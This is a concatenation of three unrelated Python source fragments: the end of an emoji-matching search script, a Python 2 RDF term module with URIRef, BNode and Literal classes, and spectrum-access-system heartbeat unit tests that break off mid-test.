EMOJI_UNICODE[":twelve_o\u2019clock:"],
# Half past the hour emoji
EMOJI_UNICODE[":one-thirty:"],
EMOJI_UNICODE[":two-thirty:"],
EMOJI_UNICODE[":three-thirty:"],
EMOJI_UNICODE[":four-thirty:"],
EMOJI_UNICODE[":five-thirty:"],
EMOJI_UNICODE[":six-thirty:"],
EMOJI_UNICODE[":seven-thirty:"],
EMOJI_UNICODE[":eight-thirty:"],
EMOJI_UNICODE[":nine-thirty:"],
EMOJI_UNICODE[":ten-thirty:"],
EMOJI_UNICODE[":eleven-thirty:"],
EMOJI_UNICODE[":twelve-thirty:"],
],
# Other clock and time related emoji
"hourglasses": [
EMOJI_UNICODE[":hourglass_done:"],
EMOJI_UNICODE[":hourglass_not_done:"],
],
"soon": [EMOJI_UNICODE[":SOON_arrow:"]],
"watch": [EMOJI_UNICODE[":watch:"]],
"stopwatch": [EMOJI_UNICODE[":stopwatch:"]],
"mantelpiece_clock": [EMOJI_UNICODE[":mantelpiece_clock:"]],
"timer_clock": [EMOJI_UNICODE[":timer_clock:"]],
"alarm_clock": [EMOJI_UNICODE[":alarm_clock:"]],
}
MATCHES_ALL = [emoji for lst in MATCHES.values() for emoji in lst]
# Unpack and list all files
if args.unpack:
unpack_files(args.data_path)
all_files = get_all_files(args.data_path, days=args.days, hours=args.hours)
# Main search loop
RESULTS_GLOBAL = run()
save_results(RESULTS_GLOBAL)
|
|
"""
This module defines the different types of terms...
"""
__all__ = [
'Node',
'Identifier',
'URIRef',
'BNode',
'Literal',
'Variable',
'Statement',
]
import logging
_LOGGER = logging.getLogger(__name__)
import base64
import re
import threading
from urlparse import urlparse, urljoin, urldefrag
from string import ascii_letters, rsplit
from random import choice
from itertools import islice
from datetime import date, time, datetime, timedelta
from time import strptime
from isodate import parse_time, parse_date, parse_datetime
try:
from hashlib import md5
except ImportError:
from md5 import md5
# from sys import version_info
# if version_info[0:2] > (2, 2):
# from unicodedata import normalize
# else:
# normalize = None
#
#from rdflib.syntax.xml_names import is_ncname
#from rdflib.exceptions import Error
class Node(object):
"""
A Node in the Graph.
"""
__slots__ = ()
class Identifier(Node, unicode): # we allow Identifiers to be Nodes in our Graph
"""
See http://www.w3.org/2002/07/rdf-identifer-terminology/
regarding choice of terminology.
"""
__slots__ = ()
def __new__(cls, value):
return unicode.__new__(cls, value)
class URIRef(Identifier):
"""
RDF URI Reference: http://www.w3.org/TR/rdf-concepts/#section-Graph-URIref
"""
__slots__ = ()
def __new__(cls, value, base=None):
if base is not None:
ends_in_hash = value.endswith("#")
value = urljoin(base, value, allow_fragments=1)
if ends_in_hash:
if not value.endswith("#"):
value += "#"
#if normalize and value and value != normalize("NFC", value):
# raise Error("value must be in NFC normalized form.")
try:
rt = unicode.__new__(cls, value)
except UnicodeDecodeError:
rt = unicode.__new__(cls, value, 'utf-8')
return rt
def n3(self):
return "<%s>" % self
def concrete(self):
if "#" in self:
return URIRef("/".join(rsplit(self, "#", 1)))
else:
return self
def abstract(self):
if "#" not in self:
scheme, netloc, path, params, query, fragment = urlparse(self)
if path:
return URIRef("#".join(rsplit(self, "/", 1)))
else:
if not self.endswith("#"):
return URIRef("%s#" % self)
else:
return self
else:
return self
def defrag(self):
if "#" in self:
url, frag = urldefrag(self)
return URIRef(url)
else:
return self
def __reduce__(self):
return (URIRef, (unicode(self),))
def __getnewargs__(self):
return (unicode(self), )
def __ne__(self, other):
return not self.__eq__(other)
def __eq__(self, other):
if isinstance(other, URIRef):
return unicode(self)==unicode(other)
else:
return False
def __str__(self):
return self.encode()
def __repr__(self):
if self.__class__ is URIRef:
clsName = "rdflib.term.URIRef"
else:
clsName = self.__class__.__name__
# quoting risk? drewp is not sure why this doesn't use %r
return """%s('%s')""" % (clsName, str(self))
def md5_term_hash(self):
"""a string of hex that will be the same for two URIRefs that
are the same. It is not a suitable unique id.
Supported for backwards compatibility; new code should
probably just use __hash__
"""
d = md5(str(self))
d.update("U")
return d.hexdigest()
def _letter():
while True:
yield choice(ascii_letters)
def _unique_id():
"""Create a (hopefully) unique prefix"""
uid = "".join(islice(_letter(), 0, 8))
return uid
def _serial_number_generator():
i = 0
while 1:
yield i
i = i + 1
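# Together, _unique_id() and _serial_number_generator() supply BNode() with its
# default identifiers: eight random ASCII letters followed by a per-session serial
# number, e.g. something like 'NdiQzfEe0' (illustrative value only).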
bNodeLock = threading.RLock()
class BNode(Identifier):
"""
Blank Node: http://www.w3.org/TR/rdf-concepts/#section-blank-nodes
"""
__slots__ = ()
def __new__(cls, value=None,
_sn_gen=_serial_number_generator(), _prefix=_unique_id()):
"""
# only store implementations should pass in a value
"""
if value is None:
# so that BNode values do not
# collide with ones created with a different instance of this module
# at some other time.
bNodeLock.acquire()
node_id = _sn_gen.next()
bNodeLock.release()
value = "%s%s" % (_prefix, node_id)
else:
# TODO: check that value falls within acceptable bnode value range
# for RDF/XML needs to be something that can be serialized
# as a nodeID for N3 ?? Unless we require these
# constraints be enforced elsewhere?
pass #assert is_ncname(unicode(value)), "BNode identifiers
#must be valid NCNames"
return Identifier.__new__(cls, value)
def n3(self):
return "_:%s" % self
def __getnewargs__(self):
return (unicode(self), )
def __reduce__(self):
return (BNode, (unicode(self),))
def __ne__(self, other):
return not self.__eq__(other)
def __eq__(self, other):
"""
>>> BNode("foo")==None
False
>>> BNode("foo")==URIRef("foo")
False
>>> URIRef("foo")==BNode("foo")
False
>>> BNode("foo")!=URIRef("foo")
True
>>> URIRef("foo")!=BNode("foo")
True
"""
if isinstance(other, BNode):
return unicode(self)==unicode(other)
else:
return False
def __str__(self):
return self.encode()
def __repr__(self):
if self.__class__ is BNode:
clsName = "rdflib.term.BNode"
else:
clsName = self.__class__.__name__
return """%s('%s')""" % (clsName, str(self))
def md5_term_hash(self):
"""a string of hex that will be the same for two BNodes that
are the same. It is not a suitable unique id.
Supported for backwards compatibility; new code should
probably just use __hash__
"""
d = md5(str(self))
d.update("B")
return d.hexdigest()
class Literal(Identifier):
"""
RDF Literal: http://www.w3.org/TR/rdf-concepts/#section-Graph-Literal
>>> Literal(1).toPython()
1L
>>> cmp(Literal("adsf"), 1)
1
>>> from rdflib.namespace import XSD
>>> lit2006 = Literal('2006-01-01',datatype=XSD.date)
>>> lit2006.toPython()
datetime.date(2006, 1, 1)
>>> lit2006 < Literal('2007-01-01',datatype=XSD.date)
True
>>> Literal(datetime.utcnow()).datatype
rdflib.term.URIRef('http://www.w3.org/2001/XMLSchema#dateTime')
>>> oneInt = Literal(1)
>>> twoInt = Literal(2)
>>> twoInt < oneInt
False
>>> Literal('1') < Literal(1)
False
>>> Literal('1') < Literal('1')
False
>>> Literal(1) < Literal('1')
True
>>> Literal(1) < Literal(2.0)
True
>>> Literal(1) < URIRef('foo')
True
>>> Literal(1) < 2.0
True
>>> Literal(1) < object
True
>>> lit2006 < "2007"
True
>>> "2005" < lit2006
True
"""
__slots__ = ("language", "datatype", "_cmp_value")
def __new__(cls, value, lang=None, datatype=None):
if lang is not None and datatype is not None:
raise TypeError("A Literal can only have one of lang or datatype, "
"per http://www.w3.org/TR/rdf-concepts/#section-Graph-Literal")
if datatype:
lang = None
else:
value, datatype = _castPythonToLiteral(value)
if datatype:
lang = None
if datatype:
datatype = URIRef(datatype)
try:
inst = unicode.__new__(cls, value)
except UnicodeDecodeError:
inst = unicode.__new__(cls, value, 'utf-8')
inst.language = lang
inst.datatype = datatype
inst._cmp_value = inst._toCompareValue()
return inst
def __reduce__(self):
return (Literal, (unicode(self), self.language, self.datatype),)
def __getstate__(self):
return (None, dict(language=self.language, datatype=self.datatype))
def __setstate__(self, arg):
_, d = arg
self.language = d["language"]
self.datatype = d["datatype"]
def __add__(self, val):
"""
>>> Literal(1) + 1
2L
>>> Literal("1") + "1"
rdflib.term.Literal(u'11')
"""
py = self.toPython()
if isinstance(py, Literal):
s = super(Literal, self).__add__(val)
return Literal(s, self.language, self.datatype)
else:
return py + val
def __lt__(self, other):
"""
>>> from rdflib.namespace import XSD
>>> Literal("YXNkZg==", datatype=XSD[u'base64Binary']) < "foo"
True
>>> u"\xfe" < Literal(u"foo")
False
>>> Literal(base64.encodestring(u"\xfe".encode("utf-8")), datatype=URIRef("http://www.w3.org/2001/XMLSchema#base64Binary")) < u"foo"
False
"""
if other is None:
return False # Nothing is less than None
try:
return self._cmp_value < other
except TypeError, te:
return unicode(self._cmp_value) < other
except UnicodeDecodeError, ue:
if isinstance(self._cmp_value, str):
return self._cmp_value < other.encode("utf-8")
else:
raise ue
def __le__(self, other):
"""
>>> from rdflib.namespace import XSD
>>> Literal('2007-01-01T10:00:00', datatype=XSD.dateTime) <= Literal('2007-01-01T10:00:00', datatype=XSD.dateTime)
True
"""
if other is None:
return False
if self==other:
return True
else:
return self < other
def __gt__(self, other):
if other is None:
return True # Everything is greater than None
try:
return self._cmp_value > other
except TypeError, te:
return unicode(self._cmp_value) > other
except UnicodeDecodeError, ue:
if isinstance(self._cmp_value, str):
return self._cmp_value > other.encode("utf-8")
else:
raise ue
def __ge__(self, other):
if other is None:
return False
if self==other:
return True
else:
return self > other
def __ne__(self, other):
"""
Overridden to ensure proper result for comparisons with None via !=.
Routes all other such != and <> comparisons to __eq__
>>> Literal('') != None
True
>>> Literal('2') <> Literal('2')
False
"""
return not self.__eq__(other)
def __hash__(self):
"""
>>> from rdflib.namespace import XSD
>>> a = {Literal('1', datatype=XSD.integer):'one'}
>>> Literal('1', datatype=XSD.double) in a
False
"Called for the key object for dictionary operations,
and by the built-in function hash(). Should return
a 32-bit integer usable as a hash value for
dictionary operations. The only required property
is that objects which compare equal have the same
hash value; it is advised to somehow mix together
(e.g., using exclusive or) the hash values for the
components of the object that also play a part in
comparison of objects." -- 3.4.1 Basic customization (Python)
"Two literals are equal if and only if all of the following hold:
* The strings of the two lexical forms compare equal, character by character.
* Either both or neither have language tags.
* The language tags, if any, compare equal.
* Either both or neither have datatype URIs.
* The two datatype URIs, if any, compare equal, character by character."
-- 6.5.1 Literal Equality (RDF: Concepts and Abstract Syntax)
"""
return Identifier.__hash__(self) ^ hash(self.language) ^ hash(self.datatype)
def __eq__(self, other):
"""
>>> f = URIRef("foo")
>>> f is None or f == ''
False
>>> Literal("1", datatype=URIRef("foo")) == Literal("1", datatype=URIRef("foo"))
True
>>> Literal("1", datatype=URIRef("foo")) == Literal("2", datatype=URIRef("foo"))
False
>>> Literal("1", datatype=URIRef("foo")) == "asdf"
False
>>> from rdflib.namespace import XSD
>>> Literal('2007-01-01', datatype=XSD.date) == Literal('2007-01-01', datatype=XSD.date)
True
>>> Literal('2007-01-01', datatype=XSD.date) == date(2007, 1, 1)
True
>>> oneInt = Literal(1)
>>> oneNoDtype = Literal('1')
>>> oneInt == oneNoDtype
False
>>> Literal("1", XSD[u'string']) == Literal("1", XSD[u'string'])
True
>>> Literal("one", lang="en") == Literal("one", lang="en")
True
>>> Literal("hast", lang='en') == Literal("hast", lang='de')
False
>>> oneInt == Literal(1)
True
>>> oneFloat = Literal(1.0)
>>> oneInt == oneFloat
True
>>> oneInt == 1
True
"""
if other is None:
return False
if isinstance(other, Literal):
return self._cmp_value == other._cmp_value
elif isinstance(other, basestring):
return unicode(self) == other
else:
return self._cmp_value == other
def n3(self):
r'''
Returns a representation in the N3 format.
Examples::
>>> Literal("foo").n3()
u'"foo"'
Strings with newlines or triple-quotes::
>>> Literal("foo\nbar").n3()
u'"""foo\nbar"""'
>>> Literal("''\'").n3()
u'"\'\'\'"'
>>> Literal('"""').n3()
u'"\\"\\"\\""'
Language::
>>> Literal("hello", lang="en").n3()
u'"hello"@en'
Datatypes::
>>> Literal(1).n3()
u'"1"^^<http://www.w3.org/2001/XMLSchema#integer>'
>>> Literal(1, lang="en").n3()
u'"1"^^<http://www.w3.org/2001/XMLSchema#integer>'
>>> Literal(1.0).n3()
u'"1.0"^^<http://www.w3.org/2001/XMLSchema#float>'
Datatype and language together aren't allowed (datatype takes precedence)::
>>> Literal(True).n3()
u'"true"^^<http://www.w3.org/2001/XMLSchema#boolean>'
Custom datatype::
>>> footype = URIRef("http://example.org/ns#foo")
>>> Literal("1", datatype=footype).n3()
u'"1"^^<http://example.org/ns#foo>'
'''
return self._literal_n3()
def _literal_n3(self, use_plain=False, qname_callback=None):
'''
Using plain literal (shorthand) output::
>>> Literal(1)._literal_n3(use_plain=True)
u'1'
>>> Literal(1.0)._literal_n3(use_plain=True)
u'1.0'
>>> from rdflib.namespace import XSD
>>> Literal("foo", datatype=XSD.string)._literal_n3(
... use_plain=True)
u'"foo"^^<http://www.w3.org/2001/XMLSchema#string>'
>>> Literal(True)._literal_n3(use_plain=True)
u'true'
>>> Literal(False)._literal_n3(use_plain=True)
u'false'
Using callback for datatype QNames::
>>> Literal(1)._literal_n3(
... qname_callback=lambda uri: u"xsd:integer")
u'"1"^^xsd:integer'
'''
if use_plain and self.datatype in _PLAIN_LITERAL_TYPES:
try:
self.toPython() # check validity
return '%s' % self
except ValueError:
pass # if it's in, we let it out?
encoded = self._quote_encode()
datatype = self.datatype
quoted_dt = None
if datatype:
if qname_callback:
quoted_dt = qname_callback(datatype)
if not quoted_dt:
quoted_dt = "<%s>" % datatype
language = self.language
if language:
if datatype:
# TODO: this isn't valid RDF (it's datatype XOR language)
return '%s@%s^^%s' % (encoded, language, quoted_dt)
return '%s@%s' % (encoded, language)
elif datatype:
return '%s^^%s' % (encoded, quoted_dt)
else:
return '%s' % encoded
def _quote_encode(self):
# This simpler encoding doesn't work; a newline gets encoded as "\\n",
# which is ok in source code, but we want "\n".
#encoded = self.encode('unicode-escape').replace(
# '\\', '\\\\').replace('"','\\"')
#encoded = self.replace.replace('\\', '\\\\').replace('"','\\"')
# NOTE: Could in theory choose quotes based on quotes appearing in the
# string, i.e. '"' and "'", but N3/turtle doesn't allow "'"(?).
# which is nicer?
# if self.find("\"")!=-1 or self.find("'")!=-1 or self.find("\n")!=-1:
if "\n" in self:
# Triple quote this string.
encoded = self.replace('\\', '\\\\')
if '"""' in self:
# is this ok?
encoded = encoded.replace('"""','\\"""')
if encoded.endswith('"'):
encoded = encoded[:-1] + "\\\""
return '"""%s"""' % encoded
else:
return '"%s"' % self.replace('\n','\\n').replace('\\', '\\\\'
).replace('"', '\\"')
def __str__(self):
return self.encode()
def __repr__(self):
args = [super(Literal, self).__repr__()]
if self.language is not None:
args.append("lang=%s" % repr(self.language))
if self.datatype is not None:
args.append("datatype=%s" % repr(self.datatype))
if self.__class__ == Literal:
clsName = "rdflib.term.Literal"
else:
clsName = self.__class__.__name__
return """%s(%s)""" % (clsName, ", ".join(args))
def toPython(self):
"""
Returns an appropriate python datatype derived from this RDF Literal
"""
convFunc = _toPythonMapping.get(self.datatype, None)
if convFunc:
rt = convFunc(self)
else:
rt = self
return rt
def _toCompareValue(self):
try:
rt = self.toPython()
except Exception, e:
_LOGGER.warning("could not convert %s to a Python datatype" %
repr(self))
rt = self
if rt is self:
if self.language is None and self.datatype is None:
return unicode(rt)
else:
return (unicode(rt), rt.datatype, rt.language)
return rt
def md5_term_hash(self):
"""a string of hex that will be the same for two Literals that
are the same. It is not a suitable unique id.
Supported for backwards compatibility; new code should
probably just use __hash__
"""
d = md5(str(self))
d.update("L")
return d.hexdigest()
_XSD_PFX = 'http://www.w3.org/2001/XMLSchema#'
_PLAIN_LITERAL_TYPES = (
URIRef(_XSD_PFX+'integer'),
URIRef(_XSD_PFX+'float'),
#XSD.decimal, XSD.double, # TODO: "subsumed" by float...
URIRef(_XSD_PFX+'boolean'),
)
def _castPythonToLiteral(obj):
"""
Casts a python datatype to a tuple of the lexical value and a
datatype URI (or None)
"""
for pType,(castFunc,dType) in _PythonToXSD:
if isinstance(obj, pType):
if castFunc:
return castFunc(obj), dType
elif dType:
return obj, dType
else:
return obj, None
return obj, None # TODO: is this right for the fall through case?
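# Illustrative results only (not doctests), following from the _PythonToXSD table
# defined below:
#   _castPythonToLiteral(True)   -> ('true', URIRef(_XSD_PFX + 'boolean'))
#   _castPythonToLiteral(1)      -> (1, URIRef(_XSD_PFX + 'integer'))
#   _castPythonToLiteral(u'foo') -> (u'foo', None)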
# Mappings from Python types to XSD datatypes and back (borrowed from sparta)
# datetime instances are also instances of date... so we need to order these.
_PythonToXSD = [
(basestring, (None, None)),
(float , (None, URIRef(_XSD_PFX+'float'))),
(bool , (lambda i:str(i).lower(), URIRef(_XSD_PFX+'boolean'))),
(int , (None, URIRef(_XSD_PFX+'integer'))),
(long , (None, URIRef(_XSD_PFX+'long'))),
(datetime , (lambda i:i.isoformat(), URIRef(_XSD_PFX+'dateTime'))),
(date , (lambda i:i.isoformat(), URIRef(_XSD_PFX+'date'))),
(time , (lambda i:i.isoformat(), URIRef(_XSD_PFX+'time'))),
]
XSDToPython = {
URIRef(_XSD_PFX+'time') : parse_time,
URIRef(_XSD_PFX+'date') : parse_date,
URIRef(_XSD_PFX+'dateTime') : parse_datetime,
URIRef(_XSD_PFX+'string') : None,
URIRef(_XSD_PFX+'normalizedString') : None,
URIRef(_XSD_PFX+'token') : None,
URIRef(_XSD_PFX+'language') : None,
URIRef(_XSD_PFX+'boolean') : lambda i:i.lower() in ['1','true'],
URIRef(_XSD_PFX+'decimal') : float,
URIRef(_XSD_PFX+'integer') : long,
URIRef(_XSD_PFX+'nonPositiveInteger') : int,
URIRef(_XSD_PFX+'long') : long,
URIRef(_XSD_PFX+'nonNegativeInteger') : int,
URIRef(_XSD_PFX+'negativeInteger') : int,
URIRef(_XSD_PFX+'int') : long,
URIRef(_XSD_PFX+'unsignedLong') : long,
URIRef(_XSD_PFX+'positiveInteger') : int,
URIRef(_XSD_PFX+'short') : int,
URIRef(_XSD_PFX+'unsignedInt') : long,
URIRef(_XSD_PFX+'byte') : int,
URIRef(_XSD_PFX+'unsignedShort') : int,
URIRef(_XSD_PFX+'unsignedByte') : int,
URIRef(_XSD_PFX+'float') : float,
URIRef(_XSD_PFX+'double') : float,
URIRef(_XSD_PFX+'base64Binary') : base64.decodestring,
URIRef(_XSD_PFX+'anyURI') : None,
}
_toPythonMapping = {}
_toPythonMapping.update(XSDToPython)
def bind(datatype, conversion_function):
"""
bind a datatype to a function for converting it into a Python
instance.
"""
if datatype in _toPythonMapping:
_LOGGER.warning("datatype '%s' was already bound. Rebinding." %
datatype)
_toPythonMapping[datatype] = conversion_function
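# Illustrative usage only -- binding xsd:decimal to Decimal is an assumption, not
# something this module does by default (rebinding an existing datatype logs a
# warning first):
#   from decimal import Decimal
#   bind(URIRef(_XSD_PFX + 'decimal'), Decimal)
#   Literal('1.5', datatype=URIRef(_XSD_PFX + 'decimal')).toPython()  # Decimal('1.5')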
class Variable(Identifier):
"""
"""
__slots__ = ()
def __new__(cls, value):
if value[0]=='?':
value=value[1:]
return unicode.__new__(cls, value)
def __repr__(self):
return self.n3()
def n3(self):
return "?%s" % self
def __reduce__(self):
return (Variable, (unicode(self),))
def md5_term_hash(self):
"""a string of hex that will be the same for two Variables that
are the same. It is not a suitable unique id.
Supported for backwards compatibility; new code should
probably just use __hash__
"""
d = md5(str(self))
d.update("V")
return d.hexdigest()
class Statement(Node, tuple):
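"""
A (subject, predicate, object) triple paired with a context, stored as the
nested tuple ((subject, predicate, object), context).
"""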
def __new__(cls, (subject, predicate, object), context):
return tuple.__new__(cls, ((subject, predicate, object), context))
def __reduce__(self):
return (Statement, (self[0], self[1]))
if __name__ == '__main__':
import doctest
doctest.testmod()
|
|
# Copyright 2016 SAS Project Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import time
import json
import os
import unittest
import logging
import sas
from util import winnforum_testcase
class HeartbeatTestcase(unittest.TestCase):
def setUp(self):
self._sas, self._sas_admin = sas.GetTestingSas()
self._sas_admin.Reset()
def tearDown(self):
pass
@winnforum_testcase
def test_10_9_4_1_1_1(self):
"""Heartbeat request immediately after CBSD moves into Granted State.
The response should be SUCCESS.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['grantId'])
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
del request, response
# Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
self.assertLess(datetime.utcnow(),
datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(response['response']['responseCode'], 0)
@winnforum_testcase
def test_WINNF_FT_S_HBT_2(self):
"""Multiple heartbeat requests after moving to Granted/Heartbeating state.
Returns response code 0 (NO_ERROR) for all requests
"""
# Register three devices
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
device_b = json.load(
open(os.path.join('testcases', 'testdata', 'device_b.json')))
self._sas_admin.InjectFccId({'fccId': device_b['fccId']})
device_c = json.load(
open(os.path.join('testcases', 'testdata', 'device_c.json')))
self._sas_admin.InjectFccId({'fccId': device_c['fccId']})
request = {'registrationRequest': [device_a, device_b, device_c]}
response = self._sas.Registration(request)['registrationResponse']
cbsd_ids = []
for resp in response:
self.assertEqual(resp['response']['responseCode'], 0)
cbsd_ids.append(resp['cbsdId'])
del request, response
# Create and send grant requests
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_ids[0]
grant_1 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_1['cbsdId'] = cbsd_ids[1]
grant_2 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_2['cbsdId'] = cbsd_ids[2]
request = {'grantRequest': [grant_0, grant_1, grant_2]}
# Check grant response
response = self._sas.Grant(request)['grantResponse']
self.assertEqual(len(response), 3)
grant_ids = []
grant_expire_times = []
for response_num, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[response_num])
self.assertEqual(resp['response']['responseCode'], 0)
grant_ids.append(resp['grantId'])
grant_expire_times.append(
datetime.strptime(resp['grantExpireTime'], '%Y-%m-%dT%H:%M:%SZ'))
del request, response
# Heartbeat the devices
heartbeat_request = []
for cbsd_id, grant_id in zip(cbsd_ids, grant_ids):
heartbeat_request.append({
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
})
request = {'heartbeatRequest': heartbeat_request}
response = self._sas.Heartbeat(request)['heartbeatResponse']
# Check the heartbeat response
self.assertEqual(len(response), 3)
for response_num, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[response_num])
self.assertEqual(resp['grantId'], grant_ids[response_num])
transmit_expire_time = datetime.strptime(resp['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time,
grant_expire_times[response_num])
self.assertEqual(resp['response']['responseCode'], 0)
@winnforum_testcase
def test_WINNF_FT_S_HBT_3(self):
"""Request grant renewal from heartbeat request.
Returns response code 0 (NO_ERROR)
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
grant_id = response['grantId']
self.assertEqual(response['response']['responseCode'], 0)
grant_expire_time = datetime.strptime(response['grantExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
del request, response
# First successful Heartbeat
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED',
'grantRenew': True
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
transmit_expire_time = datetime.strptime(response['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time, grant_expire_time)
self.assertLess(datetime.utcnow(), grant_expire_time)
self.assertEqual(response['response']['responseCode'], 0)
@winnforum_testcase
def test_WINNF_FT_S_HBT_4(self):
"""Request grant renewal from heartbeat request (3 devices).
Returns response code 0 (NO_ERROR)
"""
# Register the devices
registration_request = []
for device_filename in ('device_a.json', 'device_b.json', 'device_c.json'):
device = json.load(
open(os.path.join('testcases', 'testdata', device_filename)))
self._sas_admin.InjectFccId({'fccId': device['fccId']})
registration_request.append(device)
request = {'registrationRequest': registration_request}
response = self._sas.Registration(request)['registrationResponse']
# Check registration response
cbsd_ids = []
for resp in response:
self.assertEqual(resp['response']['responseCode'], 0)
cbsd_ids.append(resp['cbsdId'])
del request, response
# Request grant
grant_request = []
for grant_filename, cbsd_id in zip(
['grant_0.json', 'grant_0.json', 'grant_0.json'], cbsd_ids):
grant = json.load(
open(os.path.join('testcases', 'testdata', grant_filename)))
grant['cbsdId'] = cbsd_id
grant_request.append(grant)
request = {'grantRequest': grant_request}
# Check grant response
response = self._sas.Grant(request)['grantResponse']
grant_ids = []
grant_expire_times = []
for response_num, resp in enumerate(response):
self.assertEqual(resp['cbsdId'], cbsd_ids[response_num])
self.assertGreater(len(resp['grantId']), 0)
self.assertEqual(resp['response']['responseCode'], 0)
grant_ids.append(resp['grantId'])
grant_expire_times.append(
datetime.strptime(resp['grantExpireTime'], '%Y-%m-%dT%H:%M:%SZ'))
del request, response
# Heartbeat requests with grantRenew set to True
heartbeat_request = []
for cbsd_id, grant_id in zip(cbsd_ids, grant_ids):
heartbeat_request.append({
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED',
'grantRenew': True
})
request = {'heartbeatRequest': heartbeat_request}
response = self._sas.Heartbeat(request)['heartbeatResponse']
# Check the heartbeat response
for response_num, resp in enumerate(response):
transmit_expire_time = datetime.strptime(resp['transmitExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
self.assertEqual(resp['cbsdId'], cbsd_ids[response_num])
self.assertEqual(resp['grantId'], grant_ids[response_num])
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
(transmit_expire_time - datetime.utcnow()).total_seconds(), 240)
self.assertLessEqual(transmit_expire_time,
grant_expire_times[response_num])
self.assertLess(datetime.utcnow(), grant_expire_times[response_num])
self.assertEqual(resp['response']['responseCode'], 0)
@winnforum_testcase
def test_WINNF_FT_S_HBT_5(self):
"""SAS has requested CBSD to perform measurement through measReportConfig
in the initial Grant response, or through a subsequent Heartbeat Response.
The response should be SUCCESS.
"""
# Register the device
device_a = json.load(
open(os.path.join('testcases', 'testdata', 'device_a.json')))
self._sas_admin.InjectFccId({'fccId': device_a['fccId']})
device_a['measCapability'] = ['EUTRA_CARRIER_RSSI_ALWAYS']
request = {'registrationRequest': [device_a]}
response = self._sas.Registration(request)['registrationResponse'][0]
# Check registration response
self.assertEqual(response['response']['responseCode'], 0)
cbsd_id = response['cbsdId']
del request, response
# Request grant
grant_0 = json.load(
open(os.path.join('testcases', 'testdata', 'grant_0.json')))
grant_0['cbsdId'] = cbsd_id
request = {'grantRequest': [grant_0]}
# Check grant response
response = self._sas.Grant(request)['grantResponse'][0]
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertTrue(response['grantId'])
self.assertEqual(response['response']['responseCode'], 0)
grant_id = response['grantId']
grant_expire_time = datetime.strptime(response['grantExpireTime'],
'%Y-%m-%dT%H:%M:%SZ')
del request, response
# Trigger SAS to request a measurement report in all subsequent heartbeat responses
self._sas_admin.TriggerMeasurementReportHeartbeat({'measReportConfig':
['EUTRA_CARRIER_RSSI_ALWAYS']})
# First Heartbeat Request to Authorize Device
request = {
'heartbeatRequest': [{
'cbsdId': cbsd_id,
'grantId': grant_id,
'operationState': 'GRANTED'
}]
}
response = self._sas.Heartbeat(request)['heartbeatResponse'][0]
# Check the heartbeat response
self.assertTrue('EUTRA_CARRIER_RSSI_ALWAYS' in response['measReportConfig'])
self.assertEqual(response['cbsdId'], cbsd_id)
self.assertEqual(response['grantId'], grant_id)
transmit_expire_time = datetime.strptime(
response['transmitExpireTime'], '%Y-%m-%dT%H:%M:%SZ')
self.assertLess(datetime.utcnow(), transmit_expire_time)
self.assertLessEqual(
